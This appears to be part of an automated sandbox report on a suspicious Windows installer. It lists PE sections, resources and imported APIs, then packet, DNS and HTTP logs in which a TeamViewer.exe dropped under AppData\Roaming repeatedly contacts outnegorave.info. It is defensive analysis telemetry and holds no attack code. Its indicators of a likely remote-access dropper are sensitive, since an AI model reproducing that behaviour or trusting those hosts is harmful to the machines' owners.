                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                    Sections

                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                    .text0x10000x5a5a0x5c00False0.660453464674data6.41769823686IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                    .rdata0x70000x11900x1200False0.375217013889SysEx File -4.24219639454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                    .data0x90000x1af980x400False0.55859375data4.70902740305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                    .ndata0x240000x200000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                    .rsrc0x440000xd6280xd800False0.300600405093data5.06095919413IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                    Resources

                                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                                    RT_ICON0x442e00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 1056964862EnglishUnited States
                                                                                                                                    RT_ICON0x485080x25a8dataEnglishUnited States
                                                                                                                                    RT_ICON0x4aab00x2488PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                                                    RT_ICON0x4cf380x1a68dataEnglishUnited States
                                                                                                                                    RT_ICON0x4e9a00x10a8dataEnglishUnited States
                                                                                                                                    RT_ICON0x4fa480x988dataEnglishUnited States
                                                                                                                                    RT_ICON0x503d00x6b8dataEnglishUnited States
                                                                                                                                    RT_ICON0x50a880x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                    RT_DIALOG0x50ef00x202dataEnglishUnited States
                                                                                                                                    RT_DIALOG0x510f80xf8dataEnglishUnited States
                                                                                                                                    RT_DIALOG0x511f00xeedataEnglishUnited States
                                                                                                                                    RT_GROUP_ICON0x512e00x76dataEnglishUnited States
                                                                                                                                    RT_MANIFEST0x513580x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                                    Imports

                                                                                                                                    DLLImport
                                                                                                                                    KERNEL32.DLLCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                                                                                                                    ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                                                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                                                                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                    SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                                                                    USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                                                                    VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                                                    Possible Origin

                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                    EnglishUnited States

                                                                                                                                    Network Behavior

                                                                                                                                    Network Port Distribution

                                                                                                                                    TCP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Sep 15, 2021 13:51:21.990003109 CEST4974680192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.012710094 CEST8049746185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.012902975 CEST4974680192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.014369011 CEST4974680192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.036264896 CEST8049746185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.036360025 CEST4974680192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.058674097 CEST4974680192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.082068920 CEST8049746185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.082178116 CEST4974680192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.084381104 CEST4974680192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.105417967 CEST8049746185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.105448961 CEST8049746185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.105613947 CEST4974680192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.105664015 CEST4974680192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.106856108 CEST4974680192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.110876083 CEST4974780192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.128168106 CEST8049746185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.141360044 CEST8049747185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.141562939 CEST4974780192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.142888069 CEST4974780192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.165512085 CEST8049747185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.165679932 CEST4974780192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.168787956 CEST4974780192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.189806938 CEST8049747185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.189982891 CEST4974780192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.191895962 CEST4974780192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.253375053 CEST8049747185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.268311024 CEST8049747185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.269973993 CEST8049747185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.270014048 CEST4974780192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.270041943 CEST4974780192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.270260096 CEST4974780192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.272274017 CEST4974880192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.291059971 CEST8049747185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.294538021 CEST8049748185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.294722080 CEST4974880192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.297791958 CEST4974880192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.320568085 CEST8049748185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.322170019 CEST4974880192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.327142954 CEST4974880192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.349551916 CEST8049748185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.349656105 CEST4974880192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.350593090 CEST4974880192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.384879112 CEST8049748185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.385286093 CEST8049748185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.385400057 CEST4974880192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.390707970 CEST4974880192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.390743017 CEST4974880192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.405080080 CEST4974980192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.426819086 CEST8049749185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.426868916 CEST8049748185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.426955938 CEST4974980192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.429137945 CEST4974980192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.451570034 CEST8049749185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.453190088 CEST4974980192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.455246925 CEST4974980192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.480546951 CEST8049749185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.482749939 CEST4974980192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.486056089 CEST4974980192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.510013103 CEST8049749185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.510062933 CEST8049749185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.510165930 CEST4974980192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.510220051 CEST4974980192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.512547016 CEST4974980192.168.2.5185.188.32.25
                                                                                                                                    Sep 15, 2021 13:51:22.526756048 CEST4975080192.168.2.5178.255.154.140
                                                                                                                                    Sep 15, 2021 13:51:22.533428907 CEST8049749185.188.32.25192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.550478935 CEST8049750178.255.154.140192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.550611019 CEST4975080192.168.2.5178.255.154.140
                                                                                                                                    Sep 15, 2021 13:51:22.551965952 CEST4975080192.168.2.5178.255.154.140
                                                                                                                                    Sep 15, 2021 13:51:22.575599909 CEST8049750178.255.154.140192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.575773001 CEST4975080192.168.2.5178.255.154.140
                                                                                                                                    Sep 15, 2021 13:51:22.580595970 CEST4975180192.168.2.5178.255.154.140
                                                                                                                                    Sep 15, 2021 13:51:22.603822947 CEST8049751178.255.154.140192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.603945017 CEST4975180192.168.2.5178.255.154.140
                                                                                                                                    Sep 15, 2021 13:51:22.604747057 CEST4975180192.168.2.5178.255.154.140
                                                                                                                                    Sep 15, 2021 13:51:22.604825020 CEST4975180192.168.2.5178.255.154.140
                                                                                                                                    Sep 15, 2021 13:51:22.628135920 CEST8049751178.255.154.140192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.628165007 CEST8049750178.255.154.140192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.628232956 CEST4975080192.168.2.5178.255.154.140
                                                                                                                                    Sep 15, 2021 13:51:22.628406048 CEST4975180192.168.2.5178.255.154.140
                                                                                                                                    Sep 15, 2021 13:51:22.651550055 CEST8049750178.255.154.140192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.651621103 CEST4975080192.168.2.5178.255.154.140
                                                                                                                                    Sep 15, 2021 13:51:22.699284077 CEST4975180192.168.2.5178.255.154.140
                                                                                                                                    Sep 15, 2021 13:51:22.701586008 CEST8049751178.255.154.140192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.722624063 CEST8049750178.255.154.140192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.722681046 CEST8049751178.255.154.140192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.722724915 CEST4975080192.168.2.5178.255.154.140
                                                                                                                                    Sep 15, 2021 13:51:22.722754002 CEST4975180192.168.2.5178.255.154.140
                                                                                                                                    Sep 15, 2021 13:51:22.782339096 CEST4975080192.168.2.5178.255.154.140
                                                                                                                                    Sep 15, 2021 13:51:22.782838106 CEST4975080192.168.2.5178.255.154.140
                                                                                                                                    Sep 15, 2021 13:51:22.791105032 CEST4975180192.168.2.5178.255.154.140
                                                                                                                                    Sep 15, 2021 13:51:22.806339025 CEST8049750178.255.154.140192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.814366102 CEST8049751178.255.154.140192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.814495087 CEST4975180192.168.2.5178.255.154.140
                                                                                                                                    Sep 15, 2021 13:51:22.949732065 CEST4975080192.168.2.5178.255.154.140
                                                                                                                                    Sep 15, 2021 13:51:22.949821949 CEST4975080192.168.2.5178.255.154.140
                                                                                                                                    Sep 15, 2021 13:51:22.949969053 CEST4975080192.168.2.5178.255.154.140
                                                                                                                                    Sep 15, 2021 13:51:22.973503113 CEST8049750178.255.154.140192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.973537922 CEST8049751178.255.154.140192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:22.973822117 CEST4975180192.168.2.5178.255.154.140

                                                                                                                                    UDP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Sep 15, 2021 13:50:57.885914087 CEST6544753192.168.2.58.8.8.8
                                                                                                                                    Sep 15, 2021 13:50:57.915702105 CEST53654478.8.8.8192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:15.222130060 CEST5244153192.168.2.58.8.8.8
                                                                                                                                    Sep 15, 2021 13:51:15.262779951 CEST53524418.8.8.8192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:18.570023060 CEST6217653192.168.2.58.8.8.8
                                                                                                                                    Sep 15, 2021 13:51:18.597867966 CEST53621768.8.8.8192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:18.605724096 CEST5959653192.168.2.58.8.8.8
                                                                                                                                    Sep 15, 2021 13:51:18.636167049 CEST53595968.8.8.8192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:21.945890903 CEST6529653192.168.2.58.8.8.8
                                                                                                                                    Sep 15, 2021 13:51:21.976309061 CEST53652968.8.8.8192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:24.049734116 CEST6318353192.168.2.58.8.8.8
                                                                                                                                    Sep 15, 2021 13:51:24.081706047 CEST53631838.8.8.8192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:28.038701057 CEST6015153192.168.2.58.8.8.8
                                                                                                                                    Sep 15, 2021 13:51:28.064693928 CEST53601518.8.8.8192.168.2.5
                                                                                                                                    Sep 15, 2021 13:51:33.147732973 CEST5696953192.168.2.58.8.8.8
                                                                                                                                    Sep 15, 2021 13:51:33.190706968 CEST53569698.8.8.8192.168.2.5
                                                                                                                                    Sep 15, 2021 13:52:08.631544113 CEST5516153192.168.2.58.8.8.8
                                                                                                                                    Sep 15, 2021 13:52:08.667045116 CEST53551618.8.8.8192.168.2.5
                                                                                                                                    Sep 15, 2021 13:52:11.773014069 CEST5475753192.168.2.58.8.8.8
                                                                                                                                    Sep 15, 2021 13:52:11.805232048 CEST53547578.8.8.8192.168.2.5
                                                                                                                                    Sep 15, 2021 13:52:45.847038031 CEST4999253192.168.2.58.8.8.8
                                                                                                                                    Sep 15, 2021 13:52:45.889091015 CEST53499928.8.8.8192.168.2.5
                                                                                                                                    Sep 15, 2021 13:52:48.557179928 CEST6007553192.168.2.58.8.8.8
                                                                                                                                    Sep 15, 2021 13:52:48.600929022 CEST53600758.8.8.8192.168.2.5

                                                                                                                                    DNS Queries

                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                    Sep 15, 2021 13:51:18.570023060 CEST192.168.2.58.8.8.80x3592Standard query (0)ping3.dyngate.comA (IP address)IN (0x0001)
                                                                                                                                    Sep 15, 2021 13:51:18.605724096 CEST192.168.2.58.8.8.80x8dcaStandard query (0)ping3.dyngate.comA (IP address)IN (0x0001)
                                                                                                                                    Sep 15, 2021 13:51:21.945890903 CEST192.168.2.58.8.8.80xaf6aStandard query (0)master15.teamviewer.comA (IP address)IN (0x0001)
                                                                                                                                    Sep 15, 2021 13:51:24.049734116 CEST192.168.2.58.8.8.80x28eStandard query (0)outnegorave.infoA (IP address)IN (0x0001)

                                                                                                                                    DNS Answers

                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                    Sep 15, 2021 13:51:18.597867966 CEST8.8.8.8192.168.2.50x3592Name error (3)ping3.dyngate.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                    Sep 15, 2021 13:51:18.636167049 CEST8.8.8.8192.168.2.50x8dcaName error (3)ping3.dyngate.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                    Sep 15, 2021 13:51:21.976309061 CEST8.8.8.8192.168.2.50xaf6aNo error (0)master15.teamviewer.com185.188.32.25A (IP address)IN (0x0001)
                                                                                                                                    Sep 15, 2021 13:51:24.081706047 CEST8.8.8.8192.168.2.50x28eNo error (0)outnegorave.info172.67.205.33A (IP address)IN (0x0001)
                                                                                                                                    Sep 15, 2021 13:51:24.081706047 CEST8.8.8.8192.168.2.50x28eNo error (0)outnegorave.info104.21.77.64A (IP address)IN (0x0001)

                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                    • outnegorave.info
                                                                                                                                    • master15.teamviewer.com
                                                                                                                                    • 178.255.154.140

                                                                                                                                    HTTP Packets

                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    0192.168.2.549752172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    1192.168.2.549755172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    10192.168.2.549776172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    11192.168.2.549782172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    12192.168.2.549790172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    13192.168.2.549799172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    14192.168.2.549805172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    15192.168.2.549806172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    16192.168.2.549807172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    17192.168.2.549808172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    18192.168.2.549809172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    19192.168.2.549810172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    2192.168.2.549759172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    20192.168.2.549811172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    21192.168.2.549812172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    22192.168.2.549813172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    23192.168.2.549814172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    24192.168.2.549815172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    25192.168.2.549816172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    26192.168.2.549817172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    27192.168.2.549818172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    28192.168.2.549819172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    29192.168.2.549820172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    3192.168.2.549760172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    30192.168.2.549821172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    31192.168.2.549822172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    32192.168.2.549823172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    33192.168.2.549824172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    34192.168.2.549825172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    35192.168.2.549826172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    36192.168.2.549828172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    37192.168.2.549829172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    38192.168.2.549833172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    39192.168.2.549746185.188.32.2580C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Sep 15, 2021 13:51:22.014369011 CEST1051OUTGET /din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001 HTTP/1.1
                                                                                                                                    Accept: */*
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: master15.teamviewer.com
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Sep 15, 2021 13:51:22.036264896 CEST1051INHTTP/1.1 200 OK
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Cache-control: no-cache, no-store
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-length: 10
                                                                                                                                    Data Raw: 17 24 33 39 32 36 30 37 30 31
                                                                                                                                    Data Ascii: $39260701
